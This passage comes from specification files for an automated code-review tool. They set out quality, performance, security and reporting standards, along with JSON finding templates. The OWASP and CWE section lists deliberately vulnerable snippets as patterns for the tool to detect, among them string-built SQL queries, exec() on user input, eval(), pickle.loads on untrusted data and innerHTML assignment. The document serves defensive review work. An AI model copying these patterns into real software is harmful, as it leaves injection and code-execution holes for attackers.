|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Private: prefix with `_` (`_internal_cache`)
|
||||
|
||||
**Java**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Packages: lowercase (`com.example.service`)
|
||||
|
||||
### Function Complexity
|
||||
|
||||
**Cyclomatic Complexity Thresholds**:
|
||||
- **Low**: 1-5 (simple functions, easy to test)
|
||||
- **Medium**: 6-10 (acceptable, well-structured)
|
||||
- **High**: 11-20 (needs refactoring)
|
||||
- **Very High**: 21+ (critical, must refactor)
|
||||
|
||||
**Calculation**:
|
||||
```
|
||||
Complexity = 1 (base)
|
||||
+ count(if)
|
||||
+ count(else if)
|
||||
+ count(while)
|
||||
+ count(for)
|
||||
+ count(case)
|
||||
+ count(catch)
|
||||
+ count(&&)
|
||||
+ count(||)
|
||||
+ count(? :)
|
||||
```
|
||||
|
||||
### Code Duplication
|
||||
|
||||
**Thresholds**:
|
||||
- **Acceptable**: < 3% duplication
|
||||
- **Warning**: 3-5% duplication
|
||||
- **Critical**: > 5% duplication
|
||||
|
||||
**Detection**:
|
||||
- Minimum block size: 5 lines
|
||||
- Similarity threshold: 85%
|
||||
- Ignore: Comments, imports, trivial getters/setters
|
||||
|
||||
### Dead Code Detection
|
||||
|
||||
**Targets**:
|
||||
- Unused imports
|
||||
- Unused variables/functions (not exported)
|
||||
- Unreachable code (after return/throw)
|
||||
- Commented-out code blocks (> 5 lines)
|
||||
|
||||
## Performance Standards
|
||||
|
||||
### N+1 Query Prevention
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ N+1 Query
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
}
|
||||
|
||||
// ✅ Batch Query
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
```
|
||||
|
||||
### Algorithm Efficiency
|
||||
|
||||
**Common Issues**:
|
||||
- Nested loops (O(n²)) when O(n) possible
|
||||
- Array.indexOf in loop → use Set.has()
|
||||
- Array.filter().length → use Array.some()
|
||||
- Multiple array iterations → combine into one pass
|
||||
|
||||
**Acceptable Complexity**:
|
||||
- **O(1)**: Ideal for lookups
|
||||
- **O(log n)**: Good for search
|
||||
- **O(n)**: Acceptable for linear scan
|
||||
- **O(n log n)**: Acceptable for sorting
|
||||
- **O(n²)**: Avoid if possible, document if necessary
|
||||
|
||||
### Memory Leak Prevention
|
||||
|
||||
**Common Issues**:
|
||||
- Event listeners without cleanup
|
||||
- setInterval without clearInterval
|
||||
- Global variable accumulation
|
||||
- Circular references
|
||||
- Large array/object allocations
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// ❌ Memory Leak
|
||||
element.addEventListener('click', handler);
|
||||
// No cleanup
|
||||
|
||||
// ✅ Proper Cleanup
|
||||
useEffect(() => {
|
||||
element.addEventListener('click', handler);
|
||||
return () => element.removeEventListener('click', handler);
|
||||
}, []);
|
||||
```
|
||||
|
||||
### Resource Cleanup
|
||||
|
||||
**Required Cleanup**:
|
||||
- Database connections
|
||||
- File handles
|
||||
- Network sockets
|
||||
- Timers (setTimeout, setInterval)
|
||||
- Event listeners
|
||||
|
||||
## Maintainability Standards
|
||||
|
||||
### Documentation Requirements
|
||||
|
||||
**Required for**:
|
||||
- All exported functions/classes
|
||||
- Public APIs
|
||||
- Complex algorithms
|
||||
- Non-obvious business logic
|
||||
|
||||
**JSDoc Format**:
|
||||
```javascript
|
||||
/**
|
||||
* Validates user credentials and generates JWT token
|
||||
*
|
||||
* @param {string} username - User's username or email
|
||||
* @param {string} password - Plain text password
|
||||
* @returns {Promise<{token: string, expiresAt: Date}>} JWT token and expiration
|
||||
* @throws {AuthenticationError} If credentials are invalid
|
||||
*
|
||||
* @example
|
||||
* const {token} = await authenticateUser('john@example.com', 'secret123');
|
||||
*/
|
||||
async function authenticateUser(username, password) {
|
||||
// ...
|
||||
}
|
||||
```
|
||||
|
||||
**Coverage Targets**:
|
||||
- Critical modules: 100%
|
||||
- High priority: 90%
|
||||
- Medium priority: 70%
|
||||
- Low priority: 50%
|
||||
|
||||
### Test Coverage Requirements
|
||||
|
||||
**Coverage Targets**:
|
||||
- Unit tests: 80% line coverage
|
||||
- Integration tests: Key workflows covered
|
||||
- E2E tests: Critical user paths covered
|
||||
|
||||
**Required Tests**:
|
||||
- All exported functions
|
||||
- All public methods
|
||||
- Error handling paths
|
||||
- Edge cases
|
||||
|
||||
**Test File Convention**:
|
||||
```
|
||||
src/auth/login.ts
|
||||
→ src/auth/login.test.ts (unit)
|
||||
→ src/auth/login.integration.test.ts (integration)
|
||||
```
|
||||
|
||||
### Dependency Management
|
||||
|
||||
**Best Practices**:
|
||||
- Pin major versions (`"^1.2.3"` not `"*"`)
|
||||
- Avoid 0.x versions in production
|
||||
- Regular security audits (npm audit, snyk)
|
||||
- Keep dependencies up-to-date
|
||||
- Minimize dependency count
|
||||
|
||||
**Version Pinning**:
|
||||
```json
|
||||
{
|
||||
"dependencies": {
|
||||
"express": "^4.18.0", // ✅ Pinned major version
|
||||
"lodash": "*", // ❌ Wildcard
|
||||
"legacy-lib": "^0.5.0" // ⚠️ Unstable 0.x
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Magic Numbers
|
||||
|
||||
**Definition**: Numeric literals without clear meaning
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Magic numbers
|
||||
if (user.age > 18) { }
|
||||
setTimeout(() => {}, 5000);
|
||||
buffer = new Array(1048576);
|
||||
|
||||
// ✅ Named constants
|
||||
const LEGAL_AGE = 18;
|
||||
const RETRY_DELAY_MS = 5000;
|
||||
const BUFFER_SIZE_1MB = 1024 * 1024;
|
||||
|
||||
if (user.age > LEGAL_AGE) { }
|
||||
setTimeout(() => {}, RETRY_DELAY_MS);
|
||||
buffer = new Array(BUFFER_SIZE_1MB);
|
||||
```
|
||||
|
||||
**Exceptions** (acceptable magic numbers):
|
||||
- 0, 1, -1 (common values)
|
||||
- 100, 1000 (obvious scaling factors in context)
|
||||
- HTTP status codes (200, 404, 500)
|
||||
|
||||
## Error Handling Standards
|
||||
|
||||
### Required Error Handling
|
||||
|
||||
**Categories**:
|
||||
- Network errors (timeout, connection failure)
|
||||
- Database errors (query failure, constraint violation)
|
||||
- Validation errors (invalid input)
|
||||
- Authentication/Authorization errors
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Silent failure
|
||||
try {
|
||||
await saveUser(user);
|
||||
} catch (err) {
|
||||
// Empty catch
|
||||
}
|
||||
|
||||
// ❌ Generic catch
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
console.log('Error'); // No details
|
||||
}
|
||||
|
||||
// ✅ Proper handling
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
logger.error('Payment processing failed', { orderId: order.id, error: err });
|
||||
throw new PaymentError('Failed to process payment', { cause: err });
|
||||
}
|
||||
```
|
||||
|
||||
### Logging Standards
|
||||
|
||||
**Required Logs**:
|
||||
- Authentication attempts (success/failure)
|
||||
- Authorization failures
|
||||
- Data modifications (create/update/delete)
|
||||
- External API calls
|
||||
- Errors and exceptions
|
||||
|
||||
**Log Levels**:
|
||||
- **ERROR**: System errors, exceptions
|
||||
- **WARN**: Recoverable issues, deprecations
|
||||
- **INFO**: Business events, state changes
|
||||
- **DEBUG**: Detailed troubleshooting info
|
||||
|
||||
**Sensitive Data**:
|
||||
- Never log: passwords, tokens, credit cards, SSNs
|
||||
- Hash/mask: emails, IPs, usernames (in production)
|
||||
|
||||
## Code Structure Standards
|
||||
|
||||
### File Organization
|
||||
|
||||
**Max File Size**: 300 lines (excluding tests)
|
||||
**Max Function Size**: 50 lines
|
||||
|
||||
**Module Structure**:
|
||||
```
|
||||
module/
|
||||
├── index.ts # Public exports
|
||||
├── types.ts # Type definitions
|
||||
├── constants.ts # Constants
|
||||
├── utils.ts # Utilities
|
||||
├── service.ts # Business logic
|
||||
└── service.test.ts # Tests
|
||||
```
|
||||
|
||||
### Import Organization
|
||||
|
||||
**Order**:
|
||||
1. External dependencies
|
||||
2. Internal modules (absolute imports)
|
||||
3. Relative imports
|
||||
4. Type imports (TypeScript)
|
||||
|
||||
```typescript
|
||||
// ✅ Organized imports
|
||||
import express from 'express';
|
||||
import { Logger } from 'winston';
|
||||
|
||||
import { UserService } from '@/services/user';
|
||||
import { config } from '@/config';
|
||||
|
||||
import { validateEmail } from './utils';
|
||||
import { UserRepository } from './repository';
|
||||
|
||||
import type { User, UserCreateInput } from './types';
|
||||
```
|
||||
|
||||
## Scoring System
|
||||
|
||||
### Overall Score Calculation
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
|
||||
Security = 100 - (Critical × 30 + High × 2 + Medium × 0.5)
|
||||
Code Quality = 100 - (violations / total_checks × 100)
|
||||
Performance = 100 - (issues / potential_issues × 100)
|
||||
Maintainability = (doc_coverage × 0.4 + test_coverage × 0.4 + dependency_health × 0.2)
|
||||
```
|
||||
|
||||
### Risk Levels
|
||||
|
||||
- **LOW**: Score 90-100
|
||||
- **MEDIUM**: Score 70-89
|
||||
- **HIGH**: Score 50-69
|
||||
- **CRITICAL**: Score < 50
|
||||
---
|
||||
# Quality Standards
|
||||
|
||||
## Overall Quality Metrics
|
||||
|
||||
### Quality Score Formula
|
||||
|
||||
```
|
||||
Overall Quality = (
|
||||
Correctness × 0.30 +
|
||||
Security × 0.25 +
|
||||
Maintainability × 0.20 +
|
||||
Performance × 0.15 +
|
||||
Documentation × 0.10
|
||||
)
|
||||
```
|
||||
|
||||
### Score Ranges
|
||||
|
||||
| Range | Grade | Description |
|
||||
|-------|-------|-------------|
|
||||
| 90-100 | A | Excellent - Production ready |
|
||||
| 80-89 | B | Good - Minor improvements needed |
|
||||
| 70-79 | C | Acceptable - Some issues to address |
|
||||
| 60-69 | D | Poor - Significant improvements required |
|
||||
| 0-59 | F | Failing - Major issues, not production ready |
|
||||
|
||||
## Review Completeness
|
||||
|
||||
### Mandatory Checks
|
||||
|
||||
**Security**:
|
||||
- ✅ OWASP Top 10 coverage
|
||||
- ✅ CWE Top 25 coverage
|
||||
- ✅ Language-specific security patterns
|
||||
- ✅ Dependency vulnerability scan
|
||||
|
||||
**Code Quality**:
|
||||
- ✅ Naming convention compliance
|
||||
- ✅ Complexity analysis
|
||||
- ✅ Code duplication detection
|
||||
- ✅ Dead code identification
|
||||
|
||||
**Performance**:
|
||||
- ✅ N+1 query detection
|
||||
- ✅ Algorithm efficiency check
|
||||
- ✅ Memory leak detection
|
||||
- ✅ Resource cleanup verification
|
||||
|
||||
**Maintainability**:
|
||||
- ✅ Documentation coverage
|
||||
- ✅ Test coverage analysis
|
||||
- ✅ Dependency health check
|
||||
- ✅ Error handling review
|
||||
|
||||
## Reporting Standards
|
||||
|
||||
### Finding Requirements
|
||||
|
||||
Each finding must include:
|
||||
- **Unique ID**: SEC-001, BP-001, etc.
|
||||
- **Type**: Specific issue type (sql-injection, high-complexity, etc.)
|
||||
- **Severity**: Critical, High, Medium, Low
|
||||
- **Location**: File path and line number
|
||||
- **Code Snippet**: Vulnerable/problematic code
|
||||
- **Message**: Clear description of the issue
|
||||
- **Recommendation**: Specific fix guidance
|
||||
- **Example**: Before/after code example
|
||||
|
||||
### Report Structure
|
||||
|
||||
**Executive Summary**:
|
||||
- High-level overview
|
||||
- Risk assessment
|
||||
- Key statistics
|
||||
- Compliance status
|
||||
|
||||
**Detailed Findings**:
|
||||
- Organized by severity
|
||||
- Grouped by category
|
||||
- Full details for each finding
|
||||
|
||||
**Action Plan**:
|
||||
- Prioritized fix list
|
||||
- Effort estimates
|
||||
- Timeline recommendations
|
||||
|
||||
**Metrics Dashboard**:
|
||||
- Quality scores
|
||||
- Trend analysis (if historical data)
|
||||
- Compliance status
|
||||
|
||||
**Appendix**:
|
||||
- Full findings list
|
||||
- Configuration details
|
||||
- Tool versions
|
||||
- References
|
||||
|
||||
## Output File Standards
|
||||
|
||||
### File Naming
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory
|
||||
├── security-findings.json # Security findings
|
||||
├── best-practices-findings.json # Best practices findings
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Main report
|
||||
├── FIX-CHECKLIST.md # Action checklist
|
||||
└── state.json # Session state
|
||||
```
|
||||
|
||||
### JSON Schema
|
||||
|
||||
**Finding Schema**:
|
||||
```json
|
||||
{
|
||||
"id": "string",
|
||||
"type": "string",
|
||||
"category": "security|code_quality|performance|maintainability",
|
||||
"severity": "critical|high|medium|low",
|
||||
"file": "string",
|
||||
"line": "number",
|
||||
"column": "number",
|
||||
"code": "string",
|
||||
"message": "string",
|
||||
"recommendation": {
|
||||
"description": "string",
|
||||
"fix_example": "string"
|
||||
},
|
||||
"references": ["string"],
|
||||
"cwe": "string (optional)",
|
||||
"owasp": "string (optional)"
|
||||
}
|
||||
```
|
||||
|
||||
## Validation Requirements
|
||||
|
||||
### Phase Completion Criteria
|
||||
|
||||
**Phase 1 (Code Discovery)**:
|
||||
- ✅ At least 1 file discovered
|
||||
- ✅ Files categorized by priority
|
||||
- ✅ Metadata extracted
|
||||
- ✅ Inventory JSON created
|
||||
|
||||
**Phase 2 (Security Analysis)**:
|
||||
- ✅ All critical/high priority files analyzed
|
||||
- ✅ Findings have severity classification
|
||||
- ✅ CWE/OWASP mappings included
|
||||
- ✅ Fix recommendations provided
|
||||
|
||||
**Phase 3 (Best Practices)**:
|
||||
- ✅ Code quality checks completed
|
||||
- ✅ Performance analysis done
|
||||
- ✅ Maintainability assessed
|
||||
- ✅ Recommendations provided
|
||||
|
||||
**Phase 4 (Report Generation)**:
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Reports generated
|
||||
- ✅ Checklist created
|
||||
|
||||
## Skill Execution Standards
|
||||
|
||||
### Performance Targets
|
||||
|
||||
- **Phase 1**: < 30 seconds per 1000 files
|
||||
- **Phase 2**: < 60 seconds per 100 files (security)
|
||||
- **Phase 3**: < 60 seconds per 100 files (best practices)
|
||||
- **Phase 4**: < 10 seconds (report generation)
|
||||
|
||||
### Resource Limits
|
||||
|
||||
- **Memory**: < 2GB for projects with 1000+ files
|
||||
- **CPU**: Efficient pattern matching (minimize regex complexity)
|
||||
- **Disk**: Use streaming for large files (> 10MB)
|
||||
|
||||
### Error Handling
|
||||
|
||||
**Graceful Degradation**:
|
||||
- If tool unavailable: Skip check, note in report
|
||||
- If file unreadable: Log warning, continue with others
|
||||
- If analysis fails: Report error, continue with next file
|
||||
|
||||
**User Notification**:
|
||||
- Progress updates every 10% completion
|
||||
- Clear error messages with troubleshooting steps
|
||||
- Final summary with metrics and file locations
|
||||
|
||||
## Integration Standards
|
||||
|
||||
### Git Integration
|
||||
|
||||
**Pre-commit Hook**:
|
||||
```bash
|
||||
#!/bin/bash
|
||||
ccw run code-reviewer --scope staged --severity critical,high
|
||||
exit $? # Block commit if critical/high issues found
|
||||
```
|
||||
|
||||
**PR Comments**:
|
||||
- Automatic review comments on changed lines
|
||||
- Summary comment with overall findings
|
||||
- Status check (pass/fail based on threshold)
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
**Requirements**:
|
||||
- Exit code 0 if no critical/high issues
|
||||
- Exit code 1 if blocking issues found
|
||||
- JSON output for parsing
|
||||
- Configurable severity threshold
|
||||
|
||||
### IDE Integration
|
||||
|
||||
**LSP Support** (future):
|
||||
- Real-time security/quality feedback
|
||||
- Inline fix suggestions
|
||||
- Quick actions for common fixes
|
||||
|
||||
## Compliance Mapping
|
||||
|
||||
### Supported Standards
|
||||
|
||||
**PCI DSS**:
|
||||
- Requirement 6.5: Common coding vulnerabilities
|
||||
- Map findings to specific requirements
|
||||
|
||||
**HIPAA**:
|
||||
- Technical safeguards
|
||||
- Map data exposure findings
|
||||
|
||||
**GDPR**:
|
||||
- Data protection by design
|
||||
- Map sensitive data handling
|
||||
|
||||
**SOC 2**:
|
||||
- Security controls
|
||||
- Map access control findings
|
||||
|
||||
### Compliance Reports
|
||||
|
||||
Generate compliance-specific reports:
|
||||
```
|
||||
.code-review/compliance/
|
||||
├── pci-dss-report.md
|
||||
├── hipaa-report.md
|
||||
├── gdpr-report.md
|
||||
└── soc2-report.md
|
||||
```
|
||||
---
|
||||
# Security Requirements Specification
|
||||
|
||||
## OWASP Top 10 Coverage
|
||||
|
||||
### A01:2021 - Broken Access Control
|
||||
|
||||
**Checks**:
|
||||
- Missing authorization checks on protected routes
|
||||
- Insecure direct object references (IDOR)
|
||||
- Path traversal vulnerabilities
|
||||
- Missing CSRF protection
|
||||
- Elevation of privilege
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Missing auth middleware
|
||||
router.get('/admin/*', handler); // ❌ No auth check
|
||||
|
||||
// Insecure direct object reference
|
||||
router.get('/user/:id', async (req, res) => {
|
||||
const user = await User.findById(req.params.id); // ❌ No ownership check
|
||||
res.json(user);
|
||||
});
|
||||
```
|
||||
|
||||
### A02:2021 - Cryptographic Failures
|
||||
|
||||
**Checks**:
|
||||
- Sensitive data transmitted without encryption
|
||||
- Weak cryptographic algorithms (MD5, SHA1)
|
||||
- Hardcoded secrets/keys
|
||||
- Insecure random number generation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak hashing
|
||||
const hash = crypto.createHash('md5').update(password); // ❌ MD5 is weak
|
||||
|
||||
// Hardcoded secret
|
||||
const token = jwt.sign(payload, 'secret123'); // ❌ Hardcoded secret
|
||||
```
|
||||
|
||||
### A03:2021 - Injection
|
||||
|
||||
**Checks**:
|
||||
- SQL injection
|
||||
- NoSQL injection
|
||||
- Command injection
|
||||
- LDAP injection
|
||||
- XPath injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SQL injection
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`; // ❌
|
||||
|
||||
// Command injection
|
||||
exec(`git clone ${userRepo}`); // ❌
|
||||
```
|
||||
|
||||
### A04:2021 - Insecure Design
|
||||
|
||||
**Checks**:
|
||||
- Missing rate limiting
|
||||
- Lack of input validation
|
||||
- Business logic flaws
|
||||
- Missing security requirements
|
||||
|
||||
### A05:2021 - Security Misconfiguration
|
||||
|
||||
**Checks**:
|
||||
- Default credentials
|
||||
- Overly permissive CORS
|
||||
- Verbose error messages
|
||||
- Unnecessary features enabled
|
||||
- Missing security headers
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Overly permissive CORS
|
||||
app.use(cors({ origin: '*' })); // ❌
|
||||
|
||||
// Verbose error
|
||||
res.status(500).json({ error: err.stack }); // ❌
|
||||
```
|
||||
|
||||
### A06:2021 - Vulnerable and Outdated Components
|
||||
|
||||
**Checks**:
|
||||
- Dependencies with known vulnerabilities
|
||||
- Unmaintained dependencies
|
||||
- Using deprecated APIs
|
||||
|
||||
### A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Checks**:
|
||||
- Weak password requirements
|
||||
- Permits brute force attacks
|
||||
- Exposed session IDs
|
||||
- Weak JWT implementation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak bcrypt rounds
|
||||
bcrypt.hash(password, 4); // ❌ Too low (min: 10)
|
||||
|
||||
// Session ID in URL
|
||||
res.redirect(`/dashboard?sessionId=${sessionId}`); // ❌
|
||||
```
|
||||
|
||||
### A08:2021 - Software and Data Integrity Failures
|
||||
|
||||
**Checks**:
|
||||
- Insecure deserialization
|
||||
- Unsigned/unverified updates
|
||||
- CI/CD pipeline vulnerabilities
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Insecure deserialization
|
||||
const obj = eval(userInput); // ❌
|
||||
|
||||
// Pickle vulnerability (Python)
|
||||
data = pickle.loads(untrusted_data) # ❌
|
||||
```
|
||||
|
||||
### A09:2021 - Security Logging and Monitoring Failures
|
||||
|
||||
**Checks**:
|
||||
- Missing audit logs
|
||||
- Sensitive data in logs
|
||||
- Insufficient monitoring
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Password in logs
|
||||
console.log(`Login attempt: ${username}:${password}`); // ❌
|
||||
```
|
||||
|
||||
### A10:2021 - Server-Side Request Forgery (SSRF)
|
||||
|
||||
**Checks**:
|
||||
- Unvalidated URLs in requests
|
||||
- Internal network access
|
||||
- Cloud metadata exposure
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SSRF vulnerability
|
||||
const response = await fetch(userProvidedUrl); // ❌
|
||||
```
|
||||
|
||||
## CWE Top 25 Coverage
|
||||
|
||||
### CWE-79: Cross-site Scripting (XSS)
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
element.innerHTML = userInput; // ❌
|
||||
document.write(userInput); // ❌
|
||||
```
|
||||
|
||||
### CWE-89: SQL Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
query = `SELECT * FROM users WHERE name = '${name}'`; // ❌
|
||||
```
|
||||
|
||||
### CWE-20: Improper Input Validation
|
||||
|
||||
**Checks**:
|
||||
- Missing input sanitization
|
||||
- No input length limits
|
||||
- Unvalidated file uploads
|
||||
|
||||
### CWE-78: OS Command Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
exec(`ping ${userInput}`); // ❌
|
||||
```
|
||||
|
||||
### CWE-190: Integer Overflow
|
||||
|
||||
**Checks**:
|
||||
- Large number operations without bounds checking
|
||||
- Array allocation with user-controlled size
|
||||
|
||||
## Language-Specific Security Rules
|
||||
|
||||
### TypeScript/JavaScript
|
||||
|
||||
- Prototype pollution
|
||||
- eval() usage
|
||||
- Unsafe regex (ReDoS)
|
||||
- require() with dynamic input
|
||||
|
||||
### Python
|
||||
|
||||
- pickle vulnerabilities
|
||||
- yaml.unsafe_load()
|
||||
- SQL injection in SQLAlchemy
|
||||
- Command injection in subprocess
|
||||
|
||||
### Java
|
||||
|
||||
- Deserialization vulnerabilities
|
||||
- XXE in XML parsers
|
||||
- Path traversal
|
||||
- SQL injection in JDBC
|
||||
|
||||
### Go
|
||||
|
||||
- Race conditions
|
||||
- SQL injection
|
||||
- Path traversal
|
||||
- Weak cryptography
|
||||
|
||||
## Severity Classification
|
||||
|
||||
### Critical
|
||||
- Remote code execution
|
||||
- SQL injection with write access
|
||||
- Authentication bypass
|
||||
- Hardcoded credentials in production
|
||||
|
||||
### High
|
||||
- XSS in sensitive contexts
|
||||
- Missing authorization checks
|
||||
- Sensitive data exposure
|
||||
- Insecure cryptography
|
||||
|
||||
### Medium
|
||||
- Missing rate limiting
|
||||
- Weak password policy
|
||||
- Security misconfiguration
|
||||
- Information disclosure
|
||||
|
||||
### Low
|
||||
- Missing security headers
|
||||
- Verbose error messages
|
||||
- Outdated dependencies (no known exploits)
|
||||
---
|
||||
# Best Practice Finding Template
|
||||
|
||||
Use this template for documenting code quality, performance, and maintainability issues.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "BP-{number}",
|
||||
"type": "{issue-type}",
|
||||
"category": "{code_quality|performance|maintainability}",
|
||||
"severity": "{high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"function": "{function-name}",
|
||||
"message": "{clear-description}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"example": "{corrected-code}"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-{number}] {Issue Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**Category**: {Code Quality|Performance|Maintainability}
|
||||
|
||||
**Issue**: {Detailed explanation of the problem}
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`{language}
|
||||
{problematic-code}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{improved-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: {Why this matters - readability, performance, maintainability}
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: High Complexity
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-001] High Cyclomatic Complexity
|
||||
|
||||
**File**: `src/utils/validator.ts:78`
|
||||
**Category**: Code Quality
|
||||
**Function**: `validateUserInput`
|
||||
**Complexity**: 15 (threshold: 10)
|
||||
|
||||
**Issue**: Function has 15 decision points, making it difficult to test and maintain.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
function validateUserInput(input) {
|
||||
if (!input) return false;
|
||||
if (!input.email) return false;
|
||||
if (!input.email.includes('@')) return false;
|
||||
if (input.email.length > 255) return false;
|
||||
// ... 11 more conditions
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Extract validation rules
|
||||
const validationRules = {
|
||||
email: (email) => email && email.includes('@') && email.length <= 255,
|
||||
password: (pwd) => pwd && pwd.length >= 8 && /[A-Z]/.test(pwd),
|
||||
username: (name) => name && /^[a-zA-Z0-9_]+$/.test(name),
|
||||
};
|
||||
|
||||
// Simplified validator
|
||||
function validateUserInput(input) {
|
||||
return Object.entries(validationRules).every(([field, validate]) =>
|
||||
validate(input[field])
|
||||
);
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces complexity from 15 to 3, improves testability, and makes validation rules reusable.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: N+1 Query
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-002] N+1 Query Pattern
|
||||
|
||||
**File**: `src/api/orders.ts:45`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: Database query executed inside a loop, causing an N+1 query problem. For 100 orders, this creates 101 database queries instead of 2.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
const orders = await Order.findAll();
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
order.userName = user.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Batch query all users at once
|
||||
const orders = await Order.findAll();
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
|
||||
// Create lookup map for O(1) access
|
||||
const userMap = new Map(users.map(u => [u.id, u]));
|
||||
|
||||
// Enrich orders with user data
|
||||
for (const order of orders) {
|
||||
order.userName = userMap.get(order.userId)?.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces database queries from O(n) to O(1), significantly improving performance for large datasets.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Missing Documentation
|
||||
|
||||
```markdown
|
||||
### 🟡 [BP-003] Missing Documentation
|
||||
|
||||
**File**: `src/services/PaymentService.ts:23`
|
||||
**Category**: Maintainability
|
||||
|
||||
**Issue**: Exported class lacks documentation, making it difficult for other developers to understand its purpose and usage.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
export class PaymentService {
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
/**
|
||||
* Service for processing payment transactions
|
||||
*
|
||||
* Handles payment processing, refunds, and transaction logging.
|
||||
* Integrates with Stripe payment gateway.
|
||||
*
|
||||
* @example
|
||||
* const paymentService = new PaymentService();
|
||||
* const result = await paymentService.processPayment('order-123', 99.99);
|
||||
*/
|
||||
export class PaymentService {
|
||||
/**
|
||||
* Process a payment for an order
|
||||
*
|
||||
* @param orderId - Unique order identifier
|
||||
* @param amount - Payment amount in USD
|
||||
* @returns Payment confirmation with transaction ID
|
||||
* @throws {PaymentError} If payment processing fails
|
||||
*/
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Improves code discoverability and reduces onboarding time for new developers.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Memory Leak
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-004] Potential Memory Leak
|
||||
|
||||
**File**: `src/components/Chat.tsx:56`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: WebSocket event listener added without cleanup, causing memory leaks when component unmounts.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
|
||||
// Cleanup on unmount
|
||||
return () => {
|
||||
socket.off('message', handleMessage);
|
||||
};
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Prevents memory leaks and improves application stability in long-running sessions.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Guidelines
|
||||
|
||||
### High
|
||||
- Major performance impact (N+1 queries, O(n²) algorithms)
|
||||
- Critical maintainability issues (complexity > 15)
|
||||
- Missing error handling in critical paths
|
||||
|
||||
### Medium
|
||||
- Moderate performance impact
|
||||
- Code quality issues (complexity 11-15, duplication)
|
||||
- Missing tests for important features
|
||||
|
||||
### Low
|
||||
- Minor style violations
|
||||
- Missing documentation
|
||||
